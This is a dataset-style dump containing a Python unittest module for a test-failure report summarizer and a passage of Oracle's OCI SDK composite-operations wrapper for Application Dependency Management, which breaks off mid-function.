        self.assertEqual("linux-64-debug", entry_34.variant)
        self.assertEqual("rhel62", entry_34.distro)
class TestReportSummarization(unittest.TestCase):
    """
    Tests for test_failures.Report.summarize_by().
    """

    # Template entry; the ENTRIES fixture below derives variations from it.
    ENTRY = test_failures.ReportEntry(test="jstests/core/all.js",
                                      task="jsCore_WT",
                                      variant="linux-64",
                                      distro="rhel62",
                                      start_date=datetime.date(2017, 6, 3),
                                      end_date=datetime.date(2017, 6, 3),
                                      num_pass=0,
                                      num_fail=0)

    # Shared fixture: seven entries spanning 2017-06-03 .. 2017-06-17 that vary
    # one attribute at a time (task, distro, test, variant) so each grouping
    # below collapses a different subset.
    ENTRIES = [
        ENTRY._replace(start_date=datetime.date(2017, 6, 3),
                       end_date=datetime.date(2017, 6, 3),
                       num_pass=1,
                       num_fail=0),
        ENTRY._replace(task="jsCore",
                       start_date=datetime.date(2017, 6, 5),
                       end_date=datetime.date(2017, 6, 5),
                       num_pass=0,
                       num_fail=1),
        ENTRY._replace(start_date=datetime.date(2017, 6, 10),
                       end_date=datetime.date(2017, 6, 10),
                       num_pass=1,
                       num_fail=0),
        # The following entry is intentionally not in timestamp order to verify that the
        # 'time_period' parameter becomes part of the sort in summarize_by().
        ENTRY._replace(start_date=datetime.date(2017, 6, 9),
                       end_date=datetime.date(2017, 6, 9),
                       num_pass=1,
                       num_fail=0),
        ENTRY._replace(distro="rhel55",
                       start_date=datetime.date(2017, 6, 10),
                       end_date=datetime.date(2017, 6, 10),
                       num_pass=0,
                       num_fail=1),
        ENTRY._replace(test="jstests/core/all2.js",
                       start_date=datetime.date(2017, 6, 10),
                       end_date=datetime.date(2017, 6, 10),
                       num_pass=1,
                       num_fail=0),
        ENTRY._replace(variant="linux-64-debug",
                       start_date=datetime.date(2017, 6, 17),
                       end_date=datetime.date(2017, 6, 17),
                       num_pass=0,
                       num_fail=1),
    ]

    def test_group_all_by_test_task_variant_distro(self):
        """
        Tests that summarize_by() correctly accumulates all unique combinations of
        (test, task, variant, distro).
        """
        report = test_failures.Report(self.ENTRIES)
        summed_entries = report.summarize_by(test_failures.Report.TEST_TASK_VARIANT_DISTRO)
        self.assertEqual(5, len(summed_entries))
        self.assertEqual(summed_entries[0], self.ENTRY._replace(
            task="jsCore",
            start_date=datetime.date(2017, 6, 5),
            end_date=datetime.date(2017, 6, 5),
            num_pass=0,
            num_fail=1,
        ))
        self.assertEqual(summed_entries[1], self.ENTRY._replace(
            distro="rhel55",
            start_date=datetime.date(2017, 6, 10),
            end_date=datetime.date(2017, 6, 10),
            num_pass=0,
            num_fail=1,
        ))
        self.assertEqual(summed_entries[2], self.ENTRY._replace(
            start_date=datetime.date(2017, 6, 3),
            end_date=datetime.date(2017, 6, 10),
            num_pass=3,
            num_fail=0,
        ))
        self.assertEqual(summed_entries[3], self.ENTRY._replace(
            variant="linux-64-debug",
            start_date=datetime.date(2017, 6, 17),
            end_date=datetime.date(2017, 6, 17),
            num_pass=0,
            num_fail=1,
        ))
        self.assertEqual(summed_entries[4], self.ENTRY._replace(
            test="jstests/core/all2.js",
            start_date=datetime.date(2017, 6, 10),
            end_date=datetime.date(2017, 6, 10),
            num_pass=1,
            num_fail=0,
        ))

    def test_group_all_by_test_task_variant(self):
        """
        Tests that summarize_by() correctly accumulates all unique combinations of
        (test, task, variant).
        """
        report = test_failures.Report(self.ENTRIES)
        summed_entries = report.summarize_by(test_failures.Report.TEST_TASK_VARIANT)
        self.assertEqual(4, len(summed_entries))
        self.assertEqual(summed_entries[0], self.ENTRY._replace(
            task="jsCore",
            start_date=datetime.date(2017, 6, 5),
            end_date=datetime.date(2017, 6, 5),
            num_pass=0,
            num_fail=1,
        ))
        # distro is no longer part of the group key, so it becomes a Wildcard.
        self.assertEqual(summed_entries[1], self.ENTRY._replace(
            distro=test_failures.Wildcard("distros"),
            start_date=datetime.date(2017, 6, 3),
            end_date=datetime.date(2017, 6, 10),
            num_pass=3,
            num_fail=1,
        ))
        self.assertEqual(summed_entries[2], self.ENTRY._replace(
            variant="linux-64-debug",
            start_date=datetime.date(2017, 6, 17),
            end_date=datetime.date(2017, 6, 17),
            num_pass=0,
            num_fail=1,
        ))
        self.assertEqual(summed_entries[3], self.ENTRY._replace(
            test="jstests/core/all2.js",
            start_date=datetime.date(2017, 6, 10),
            end_date=datetime.date(2017, 6, 10),
            num_pass=1,
            num_fail=0,
        ))

    def test_group_all_by_test_task(self):
        """
        Tests that summarize_by() correctly accumulates all unique combinations of (test, task).
        """
        report = test_failures.Report(self.ENTRIES)
        summed_entries = report.summarize_by(test_failures.Report.TEST_TASK)
        self.assertEqual(3, len(summed_entries))
        self.assertEqual(summed_entries[0], self.ENTRY._replace(
            task="jsCore",
            start_date=datetime.date(2017, 6, 5),
            end_date=datetime.date(2017, 6, 5),
            num_pass=0,
            num_fail=1,
        ))
        self.assertEqual(summed_entries[1], self.ENTRY._replace(
            variant=test_failures.Wildcard("variants"),
            distro=test_failures.Wildcard("distros"),
            start_date=datetime.date(2017, 6, 3),
            end_date=datetime.date(2017, 6, 17),
            num_pass=3,
            num_fail=2,
        ))
        self.assertEqual(summed_entries[2], self.ENTRY._replace(
            test="jstests/core/all2.js",
            start_date=datetime.date(2017, 6, 10),
            end_date=datetime.date(2017, 6, 10),
            num_pass=1,
            num_fail=0,
        ))

    def test_group_all_by_test(self):
        """
        Tests that summarize_by() correctly accumulates all unique combinations of (test,).
        """
        report = test_failures.Report(self.ENTRIES)
        summed_entries = report.summarize_by(test_failures.Report.TEST)
        self.assertEqual(2, len(summed_entries))
        self.assertEqual(summed_entries[0], self.ENTRY._replace(
            task=test_failures.Wildcard("tasks"),
            variant=test_failures.Wildcard("variants"),
            distro=test_failures.Wildcard("distros"),
            start_date=datetime.date(2017, 6, 3),
            end_date=datetime.date(2017, 6, 17),
            num_pass=3,
            num_fail=3,
        ))
        self.assertEqual(summed_entries[1], self.ENTRY._replace(
            test="jstests/core/all2.js",
            start_date=datetime.date(2017, 6, 10),
            end_date=datetime.date(2017, 6, 10),
            num_pass=1,
            num_fail=0,
        ))

    def test_group_all_by_variant_task(self):
        """
        Tests that summarize_by() correctly accumulates all unique combinations of (variant, task).
        """
        report = test_failures.Report(self.ENTRIES)
        # Components can also be given as a plain list of attribute names.
        summed_entries = report.summarize_by(["variant", "task"])
        self.assertEqual(3, len(summed_entries))
        self.assertEqual(summed_entries[0], self.ENTRY._replace(
            task="jsCore",
            start_date=datetime.date(2017, 6, 5),
            end_date=datetime.date(2017, 6, 5),
            num_pass=0,
            num_fail=1,
        ))
        self.assertEqual(summed_entries[1], self.ENTRY._replace(
            test=test_failures.Wildcard("tests"),
            distro=test_failures.Wildcard("distros"),
            start_date=datetime.date(2017, 6, 3),
            end_date=datetime.date(2017, 6, 10),
            num_pass=4,
            num_fail=1,
        ))
        self.assertEqual(summed_entries[2], self.ENTRY._replace(
            variant="linux-64-debug",
            start_date=datetime.date(2017, 6, 17),
            end_date=datetime.date(2017, 6, 17),
            num_pass=0,
            num_fail=1,
        ))

    def test_group_weekly_by_test_starting_on_sunday(self):
        """
        Tests that summarize_by() correctly accumulates by week when the beginning of the week is
        specified as the string "sunday".
        """
        report = test_failures.Report(self.ENTRIES)
        summed_entries = report.summarize_by(test_failures.Report.TEST,
                                             time_period=test_failures.Report.WEEKLY,
                                             start_day_of_week=test_failures.Report.SUNDAY)
        self.assertEqual(4, len(summed_entries))
        self.assertEqual(summed_entries[0], self.ENTRY._replace(
            start_date=datetime.date(2017, 6, 3),
            end_date=datetime.date(2017, 6, 3),
            num_pass=1,
            num_fail=0,
        ))
        self.assertEqual(summed_entries[1], self.ENTRY._replace(
            task=test_failures.Wildcard("tasks"),
            distro=test_failures.Wildcard("distros"),
            start_date=datetime.date(2017, 6, 4),
            end_date=datetime.date(2017, 6, 10),
            num_pass=2,
            num_fail=2,
        ))
        self.assertEqual(summed_entries[2], self.ENTRY._replace(
            variant="linux-64-debug",
            start_date=datetime.date(2017, 6, 11),
            end_date=datetime.date(2017, 6, 17),
            num_pass=0,
            num_fail=1,
        ))
        self.assertEqual(summed_entries[3], self.ENTRY._replace(
            test="jstests/core/all2.js",
            start_date=datetime.date(2017, 6, 4),
            end_date=datetime.date(2017, 6, 10),
            num_pass=1,
            num_fail=0,
        ))

    def test_group_weekly_by_test_starting_on_monday(self):
        """
        Tests that summarize_by() correctly accumulates by week when the beginning of the week is
        specified as the string "monday".
        """
        report = test_failures.Report(self.ENTRIES)
        summed_entries = report.summarize_by(test_failures.Report.TEST,
                                             time_period=test_failures.Report.WEEKLY,
                                             start_day_of_week=test_failures.Report.MONDAY)
        self.assertEqual(4, len(summed_entries))
        self.assertEqual(summed_entries[0], self.ENTRY._replace(
            start_date=datetime.date(2017, 6, 3),
            end_date=datetime.date(2017, 6, 4),
            num_pass=1,
            num_fail=0,
        ))
        self.assertEqual(summed_entries[1], self.ENTRY._replace(
            task=test_failures.Wildcard("tasks"),
            distro=test_failures.Wildcard("distros"),
            start_date=datetime.date(2017, 6, 5),
            end_date=datetime.date(2017, 6, 11),
            num_pass=2,
            num_fail=2,
        ))
        self.assertEqual(summed_entries[2], self.ENTRY._replace(
            variant="linux-64-debug",
            start_date=datetime.date(2017, 6, 12),
            end_date=datetime.date(2017, 6, 17),
            num_pass=0,
            num_fail=1,
        ))
        self.assertEqual(summed_entries[3], self.ENTRY._replace(
            test="jstests/core/all2.js",
            start_date=datetime.date(2017, 6, 5),
            end_date=datetime.date(2017, 6, 11),
            num_pass=1,
            num_fail=0,
        ))

    def test_group_weekly_by_test_starting_on_date(self):
        """
        Tests that summarize_by() correctly accumulates by week when the beginning of the week is
        specified as a datetime.date() value.
        """
        date = datetime.date(2017, 6, 7)
        self.assertEqual(2, date.weekday(), "2017 Jun 07 is a Wednesday")

        report = test_failures.Report(self.ENTRIES)
        summed_entries = report.summarize_by(test_failures.Report.TEST,
                                             time_period=test_failures.Report.WEEKLY,
                                             start_day_of_week=date)
        self.assertEqual(4, len(summed_entries))
        self.assertEqual(summed_entries[0], self.ENTRY._replace(
            task=test_failures.Wildcard("tasks"),
            start_date=datetime.date(2017, 6, 3),
            end_date=datetime.date(2017, 6, 6),
            num_pass=1,
            num_fail=1,
        ))
        self.assertEqual(summed_entries[1], self.ENTRY._replace(
            distro=test_failures.Wildcard("distros"),
            start_date=datetime.date(2017, 6, 7),
            end_date=datetime.date(2017, 6, 13),
            num_pass=2,
            num_fail=1,
        ))
        self.assertEqual(summed_entries[2], self.ENTRY._replace(
            variant="linux-64-debug",
            start_date=datetime.date(2017, 6, 14),
            end_date=datetime.date(2017, 6, 17),
            num_pass=0,
            num_fail=1,
        ))
        self.assertEqual(summed_entries[3], self.ENTRY._replace(
            test="jstests/core/all2.js",
            start_date=datetime.date(2017, 6, 7),
            end_date=datetime.date(2017, 6, 13),
            num_pass=1,
            num_fail=0,
        ))

    def test_group_daily_by_test(self):
        """
        Tests that summarize_by() correctly accumulates by day.
        """
        report = test_failures.Report(self.ENTRIES)
        summed_entries = report.summarize_by(test_failures.Report.TEST,
                                             time_period=test_failures.Report.DAILY)
        self.assertEqual(6, len(summed_entries))
        self.assertEqual(summed_entries[0], self.ENTRY._replace(
            start_date=datetime.date(2017, 6, 3),
            end_date=datetime.date(2017, 6, 3),
            num_pass=1,
            num_fail=0,
        ))
        self.assertEqual(summed_entries[1], self.ENTRY._replace(
            task="jsCore",
            start_date=datetime.date(2017, 6, 5),
            end_date=datetime.date(2017, 6, 5),
            num_pass=0,
            num_fail=1,
        ))
        self.assertEqual(summed_entries[2], self.ENTRY._replace(
            start_date=datetime.date(2017, 6, 9),
            end_date=datetime.date(2017, 6, 9),
            num_pass=1,
            num_fail=0,
        ))
        self.assertEqual(summed_entries[3], self.ENTRY._replace(
            distro=test_failures.Wildcard("distros"),
            start_date=datetime.date(2017, 6, 10),
            end_date=datetime.date(2017, 6, 10),
            num_pass=1,
            num_fail=1,
        ))
        self.assertEqual(summed_entries[4], self.ENTRY._replace(
            variant="linux-64-debug",
            start_date=datetime.date(2017, 6, 17),
            end_date=datetime.date(2017, 6, 17),
            num_pass=0,
            num_fail=1,
        ))
        self.assertEqual(summed_entries[5], self.ENTRY._replace(
            test="jstests/core/all2.js",
            start_date=datetime.date(2017, 6, 10),
            end_date=datetime.date(2017, 6, 10),
            num_pass=1,
            num_fail=0,
        ))

    def test_group_4days_by_test(self):
        """
        Tests that summarize_by() correctly accumulates by multiple days.
        """
        report = test_failures.Report(self.ENTRIES)
        summed_entries = report.summarize_by(test_failures.Report.TEST,
                                             time_period=datetime.timedelta(days=4))
        self.assertEqual(4, len(summed_entries))
        self.assertEqual(summed_entries[0], self.ENTRY._replace(
            task=test_failures.Wildcard("tasks"),
            start_date=datetime.date(2017, 6, 3),
            end_date=datetime.date(2017, 6, 6),
            num_pass=1,
            num_fail=1,
        ))
        self.assertEqual(summed_entries[1], self.ENTRY._replace(
            distro=test_failures.Wildcard("distros"),
            start_date=datetime.date(2017, 6, 7),
            end_date=datetime.date(2017, 6, 10),
            num_pass=2,
            num_fail=1,
        ))
        self.assertEqual(summed_entries[2], self.ENTRY._replace(
            variant="linux-64-debug",
            start_date=datetime.date(2017, 6, 15),
            end_date=datetime.date(2017, 6, 17),
            num_pass=0,
            num_fail=1,
        ))
        self.assertEqual(summed_entries[3], self.ENTRY._replace(
            test="jstests/core/all2.js",
            start_date=datetime.date(2017, 6, 7),
            end_date=datetime.date(2017, 6, 10),
            num_pass=1,
            num_fail=0,
        ))

    def test_group_9days_by_test(self):
        """
        Tests that summarize_by() correctly accumulates by multiple days, including time periods
        greater than 1 week.
        """
        report = test_failures.Report(self.ENTRIES)
        summed_entries = report.summarize_by(test_failures.Report.TEST,
                                             time_period=datetime.timedelta(days=9))
        self.assertEqual(3, len(summed_entries))
        self.assertEqual(summed_entries[0], self.ENTRY._replace(
            task=test_failures.Wildcard("tasks"),
            distro=test_failures.Wildcard("distros"),
            start_date=datetime.date(2017, 6, 3),
            end_date=datetime.date(2017, 6, 11),
            num_pass=3,
            num_fail=2,
        ))
        self.assertEqual(summed_entries[1], self.ENTRY._replace(
            variant="linux-64-debug",
            start_date=datetime.date(2017, 6, 12),
            end_date=datetime.date(2017, 6, 17),
            num_pass=0,
            num_fail=1,
        ))
        self.assertEqual(summed_entries[2], self.ENTRY._replace(
            test="jstests/core/all2.js",
            start_date=datetime.date(2017, 6, 3),
            end_date=datetime.date(2017, 6, 11),
            num_pass=1,
            num_fail=0,
        ))
| 41.233383
| 99
| 0.571557
| 3,317
| 27,915
| 4.603557
| 0.051553
| 0.116306
| 0.15298
| 0.149181
| 0.88854
| 0.853766
| 0.819777
| 0.798232
| 0.768304
| 0.752325
| 0
| 0.072572
| 0.31535
| 27,915
| 676
| 100
| 41.294379
| 0.726402
| 0.076482
| 0
| 0.744275
| 0
| 0
| 0.045525
| 0
| 0
| 0
| 0
| 0
| 0.206107
| 1
| 0.032443
| false
| 0.116412
| 0.007634
| 0
| 0.049618
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
0a411bc3a07228ad0c6e64ade12ee1d0c1cad812
| 17,413
|
py
|
Python
|
src/oci/adm/application_dependency_management_client_composite_operations.py
|
pabs3/oci-python-sdk
|
437ba18ce39af2d1090e277c4bb8750c89f83021
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/oci/adm/application_dependency_management_client_composite_operations.py
|
pabs3/oci-python-sdk
|
437ba18ce39af2d1090e277c4bb8750c89f83021
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
src/oci/adm/application_dependency_management_client_composite_operations.py
|
pabs3/oci-python-sdk
|
437ba18ce39af2d1090e277c4bb8750c89f83021
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
import oci # noqa: F401
from oci.util import WAIT_RESOURCE_NOT_FOUND # noqa: F401
class ApplicationDependencyManagementClientCompositeOperations(object):
"""
This class provides a wrapper around :py:class:`~oci.adm.ApplicationDependencyManagementClient` and offers convenience methods
for operations that would otherwise need to be chained together. For example, instead of performing an action
on a resource (e.g. launching an instance, creating a load balancer) and then using a waiter to wait for the resource
to enter a given state, you can call a single method in this class to accomplish the same functionality
"""
def __init__(self, client, **kwargs):
"""
Creates a new ApplicationDependencyManagementClientCompositeOperations object
:param ApplicationDependencyManagementClient client:
The service client which will be wrapped by this object
"""
self.client = client
def change_knowledge_base_compartment_and_wait_for_state(self, knowledge_base_id, change_knowledge_base_compartment_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.adm.ApplicationDependencyManagementClient.change_knowledge_base_compartment` and waits for the :py:class:`~oci.adm.models.WorkRequest`
to enter the given state(s).
:param str knowledge_base_id: (required)
The Oracle Cloud Identifier (`OCID`__) of a Knowledge Base, as a URL path parameter.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.adm.models.ChangeKnowledgeBaseCompartmentDetails change_knowledge_base_compartment_details: (required)
The information to be updated.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.adm.models.WorkRequest.status`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.adm.ApplicationDependencyManagementClient.change_knowledge_base_compartment`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.change_knowledge_base_compartment(knowledge_base_id, change_knowledge_base_compartment_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_work_request(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_knowledge_base_and_wait_for_state(self, create_knowledge_base_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.adm.ApplicationDependencyManagementClient.create_knowledge_base` and waits for the :py:class:`~oci.adm.models.WorkRequest`
to enter the given state(s).
:param oci.adm.models.CreateKnowledgeBaseDetails create_knowledge_base_details: (required)
The details to create a new Knowledge Base.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.adm.models.WorkRequest.status`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.adm.ApplicationDependencyManagementClient.create_knowledge_base`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_knowledge_base(create_knowledge_base_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_work_request(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_vulnerability_audit_and_wait_for_state(self, create_vulnerability_audit_details, wait_for_states=None, operation_kwargs=None, waiter_kwargs=None):
    """
    Calls :py:func:`~oci.adm.ApplicationDependencyManagementClient.create_vulnerability_audit` and waits for the :py:class:`~oci.adm.models.WorkRequest`
    to enter the given state(s).

    :param oci.adm.models.CreateVulnerabilityAuditDetails create_vulnerability_audit_details: (required)
        The details to create a new Vulnerability Audit.

    :param list[str] wait_for_states:
        An array of states to wait on. These should be valid values for :py:attr:`~oci.adm.models.WorkRequest.status`

    :param dict operation_kwargs:
        A dictionary of keyword arguments to pass to :py:func:`~oci.adm.ApplicationDependencyManagementClient.create_vulnerability_audit`

    :param dict waiter_kwargs:
        A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
        as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
    """
    # Avoid shared mutable default arguments; None behaves exactly like the
    # old []/{} defaults, so this is backward compatible for all callers.
    wait_for_states = wait_for_states or []
    operation_kwargs = operation_kwargs or {}
    waiter_kwargs = waiter_kwargs or {}

    operation_result = self.client.create_vulnerability_audit(create_vulnerability_audit_details, **operation_kwargs)
    if not wait_for_states:
        return operation_result

    lowered_wait_for_states = [w.lower() for w in wait_for_states]
    # The create is asynchronous: poll the work request it spawned.
    wait_for_resource_id = operation_result.headers['opc-work-request-id']

    try:
        waiter_result = oci.wait_until(
            self.client,
            self.client.get_work_request(wait_for_resource_id),
            evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
            **waiter_kwargs
        )
        return waiter_result
    except Exception as e:
        # Surface the partial result so callers can inspect what did complete.
        raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_knowledge_base_and_wait_for_state(self, knowledge_base_id, wait_for_states=None, operation_kwargs=None, waiter_kwargs=None):
    """
    Calls :py:func:`~oci.adm.ApplicationDependencyManagementClient.delete_knowledge_base` and waits for the :py:class:`~oci.adm.models.WorkRequest`
    to enter the given state(s).

    :param str knowledge_base_id: (required)
        The Oracle Cloud Identifier (`OCID`__) of a Knowledge Base, as a URL path parameter.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param list[str] wait_for_states:
        An array of states to wait on. These should be valid values for :py:attr:`~oci.adm.models.WorkRequest.status`

    :param dict operation_kwargs:
        A dictionary of keyword arguments to pass to :py:func:`~oci.adm.ApplicationDependencyManagementClient.delete_knowledge_base`

    :param dict waiter_kwargs:
        A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
        as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
    """
    # Avoid shared mutable default arguments; None behaves exactly like the
    # old []/{} defaults, so this is backward compatible for all callers.
    wait_for_states = wait_for_states or []
    operation_kwargs = operation_kwargs or {}
    waiter_kwargs = waiter_kwargs or {}

    operation_result = None
    try:
        operation_result = self.client.delete_knowledge_base(knowledge_base_id, **operation_kwargs)
    except oci.exceptions.ServiceError as e:
        if e.status == 404:
            # Resource is already gone: treat deleting a missing resource as success.
            return WAIT_RESOURCE_NOT_FOUND
        else:
            raise e

    if not wait_for_states:
        return operation_result

    lowered_wait_for_states = [w.lower() for w in wait_for_states]
    # The delete is asynchronous: poll the work request it spawned.
    wait_for_resource_id = operation_result.headers['opc-work-request-id']

    try:
        waiter_result = oci.wait_until(
            self.client,
            self.client.get_work_request(wait_for_resource_id),
            evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
            **waiter_kwargs
        )
        return waiter_result
    except Exception as e:
        # Surface the partial result so callers can inspect what did complete.
        raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_vulnerability_audit_and_wait_for_state(self, vulnerability_audit_id, wait_for_states=None, operation_kwargs=None, waiter_kwargs=None):
    """
    Calls :py:func:`~oci.adm.ApplicationDependencyManagementClient.delete_vulnerability_audit` and waits for the :py:class:`~oci.adm.models.VulnerabilityAudit` acted upon
    to enter the given state(s).

    :param str vulnerability_audit_id: (required)
        Unique Vulnerability Audit identifier path parameter.

    :param list[str] wait_for_states:
        An array of states to wait on. These should be valid values for :py:attr:`~oci.adm.models.VulnerabilityAudit.lifecycle_state`

    :param dict operation_kwargs:
        A dictionary of keyword arguments to pass to :py:func:`~oci.adm.ApplicationDependencyManagementClient.delete_vulnerability_audit`

    :param dict waiter_kwargs:
        A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
        as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
    """
    # Avoid shared mutable default arguments; None behaves exactly like the
    # old []/{} defaults, so this is backward compatible for all callers.
    wait_for_states = wait_for_states or []
    operation_kwargs = operation_kwargs or {}
    waiter_kwargs = waiter_kwargs or {}

    # Fetch the resource first: after a successful delete a GET may 404, so the
    # waiter polls from this initial response with succeed_on_not_found=True.
    initial_get_result = self.client.get_vulnerability_audit(vulnerability_audit_id)

    operation_result = None
    try:
        operation_result = self.client.delete_vulnerability_audit(vulnerability_audit_id, **operation_kwargs)
    except oci.exceptions.ServiceError as e:
        if e.status == 404:
            # Resource is already gone: treat deleting a missing resource as success.
            return WAIT_RESOURCE_NOT_FOUND
        else:
            raise e

    if not wait_for_states:
        return operation_result

    lowered_wait_for_states = [w.lower() for w in wait_for_states]

    try:
        waiter_result = oci.wait_until(
            self.client,
            initial_get_result,
            evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
            succeed_on_not_found=True,
            **waiter_kwargs
        )
        return waiter_result
    except Exception as e:
        # Surface the partial result so callers can inspect what did complete.
        raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_knowledge_base_and_wait_for_state(self, knowledge_base_id, update_knowledge_base_details, wait_for_states=None, operation_kwargs=None, waiter_kwargs=None):
    """
    Calls :py:func:`~oci.adm.ApplicationDependencyManagementClient.update_knowledge_base` and waits for the :py:class:`~oci.adm.models.WorkRequest`
    to enter the given state(s).

    :param str knowledge_base_id: (required)
        The Oracle Cloud Identifier (`OCID`__) of a Knowledge Base, as a URL path parameter.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param oci.adm.models.UpdateKnowledgeBaseDetails update_knowledge_base_details: (required)
        The details to update a Knowledge Base.

    :param list[str] wait_for_states:
        An array of states to wait on. These should be valid values for :py:attr:`~oci.adm.models.WorkRequest.status`

    :param dict operation_kwargs:
        A dictionary of keyword arguments to pass to :py:func:`~oci.adm.ApplicationDependencyManagementClient.update_knowledge_base`

    :param dict waiter_kwargs:
        A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
        as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
    """
    # Avoid shared mutable default arguments; None behaves exactly like the
    # old []/{} defaults, so this is backward compatible for all callers.
    wait_for_states = wait_for_states or []
    operation_kwargs = operation_kwargs or {}
    waiter_kwargs = waiter_kwargs or {}

    operation_result = self.client.update_knowledge_base(knowledge_base_id, update_knowledge_base_details, **operation_kwargs)
    if not wait_for_states:
        return operation_result

    lowered_wait_for_states = [w.lower() for w in wait_for_states]
    # The update is asynchronous: poll the work request it spawned.
    wait_for_resource_id = operation_result.headers['opc-work-request-id']

    try:
        waiter_result = oci.wait_until(
            self.client,
            self.client.get_work_request(wait_for_resource_id),
            evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_wait_for_states,
            **waiter_kwargs
        )
        return waiter_result
    except Exception as e:
        # Surface the partial result so callers can inspect what did complete.
        raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_vulnerability_audit_and_wait_for_state(self, vulnerability_audit_id, update_vulnerability_audit_details, wait_for_states=None, operation_kwargs=None, waiter_kwargs=None):
    """
    Calls :py:func:`~oci.adm.ApplicationDependencyManagementClient.update_vulnerability_audit` and waits for the :py:class:`~oci.adm.models.VulnerabilityAudit` acted upon
    to enter the given state(s).

    :param str vulnerability_audit_id: (required)
        Unique Vulnerability Audit identifier path parameter.

    :param oci.adm.models.UpdateVulnerabilityAuditDetails update_vulnerability_audit_details: (required)
        The details to update a Vulnerability Audit.

    :param list[str] wait_for_states:
        An array of states to wait on. These should be valid values for :py:attr:`~oci.adm.models.VulnerabilityAudit.lifecycle_state`

    :param dict operation_kwargs:
        A dictionary of keyword arguments to pass to :py:func:`~oci.adm.ApplicationDependencyManagementClient.update_vulnerability_audit`

    :param dict waiter_kwargs:
        A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
        as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
    """
    # Avoid shared mutable default arguments; None behaves exactly like the
    # old []/{} defaults, so this is backward compatible for all callers.
    wait_for_states = wait_for_states or []
    operation_kwargs = operation_kwargs or {}
    waiter_kwargs = waiter_kwargs or {}

    operation_result = self.client.update_vulnerability_audit(vulnerability_audit_id, update_vulnerability_audit_details, **operation_kwargs)
    if not wait_for_states:
        return operation_result

    lowered_wait_for_states = [w.lower() for w in wait_for_states]
    # This update completes synchronously on the resource itself, so poll the
    # Vulnerability Audit's lifecycle_state rather than a work request.
    wait_for_resource_id = operation_result.data.id

    try:
        waiter_result = oci.wait_until(
            self.client,
            self.client.get_vulnerability_audit(wait_for_resource_id),
